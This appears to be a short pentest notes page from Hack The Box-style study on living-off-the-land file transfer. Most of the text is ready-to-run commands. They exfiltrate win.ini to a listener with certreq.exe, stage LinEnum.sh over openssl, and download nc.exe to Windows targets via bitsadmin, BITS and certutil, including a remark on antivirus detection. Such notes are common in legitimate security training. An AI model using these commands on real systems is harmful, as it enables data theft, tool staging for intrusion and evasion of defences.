Transfer & Exfiltration

Living off the Land (Binary Uploads/Downloads)

Notes and commands for living off the land binary uploads/downloads.

2024-03-28

Tags file-transferliving-of-the-land-binary-up-downloads

Back to Pentest Notes Search Notes

LOLBAS for Windows and GTFOBins for Linux.

LOLBAS (Windows)

Search for upload/download: https://lolbas-project.github.io/

Example upload:

1
2
sudo nc -lvnp 8000
C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

If -Post fails, download an updated certreq.exe: https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe

GTFOBins (Linux)

Search for upload/download using +file download or +file upload.

Example with OpenSSL (often installed):

1
2
3
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Bitsadmin (HTTP/SMB downloads)

1
2
PS C:\htb> bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
PS C:\htb> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Certutil

Always installed on Windows; similar to wget, but commonly flagged by antivirus.

1
C:\htb> certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe